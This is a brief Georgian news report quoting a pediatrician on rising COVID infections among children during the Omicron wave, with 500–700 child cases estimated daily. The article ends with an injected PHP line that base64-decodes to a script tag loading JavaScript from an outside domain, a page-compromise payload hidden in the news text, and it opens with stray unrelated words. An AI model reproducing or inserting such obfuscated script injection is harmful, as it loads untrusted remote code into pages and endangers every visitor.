celsiusi
ავერსი შნაიდერი
იაშვილის კლინიკის პედიატრიული განყოფილების ხელმძღვანელი ივანე ჩხაიძე ამბობს, რომ ყოველდღიურად ქვეყანაში ინფიცირებული შემთხვევებიდან 500-700, სავარაუდოდ, ბავშვია.
 
როგორც ჩხაიძემ დღეს გამართულ პრესკონფერენციაზე განაცხადა, ინფიცირების და ჰოსპიტალიზაციის მაჩვენებელმა განსაკუთრებით ერთ წლამდე ასაკის ბავშვებში მოიმატა.
 
„საქართველოში ბოლო 2 კვირის განმავლობაში მკვეთრად მოიმატა მიმართვიანობამ პედიატრიულ განყოფილებებში, 5 ათას ინფიცირებულში 10-15% არის ბავშვი. ყოველდღიურად ქვეყანაში გვყავს, სავარაუდოდ, 500-700 ინფიცირებული ბავშვი, რაც ძალიან მაღალი მაჩვენებელია. ძალიან გაიზარდა მაჩვენებელი როგორც ზოგადი ინფიცირების, ასევე ბავშვების წილი ამ მაჩვენებელში გაცილებით მაღალია, ვიდრე აქამდე იყო.
 
ბავშვებში ინფიცირების შემთხვევებმა "დელტას" შტამის გავრცელების დროს მოიმატა და „ომიკრონმა“ ეს ტენდენცია "გააგრძელა", ფაქტია, "ომიკრონის" სამიზნე არის უფრო ახალგაზრდა ასაკი და განსაკუთრებით ეს ეხება ბავშვებს, ამიტომ აბსოლუტურად ლოგიკურია, რომ პედიატრიულ დაწესებულებებში მოიმატა მიმართვიანობამ", - განაცხადა ივანე ჩხაიძემ.
 
შეგახსენებთ, დღეს ქვეყანაში კორონავირუსით ინფიცირების 7 521 ახალი შემთხვევა გამოვლინდა.
848
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");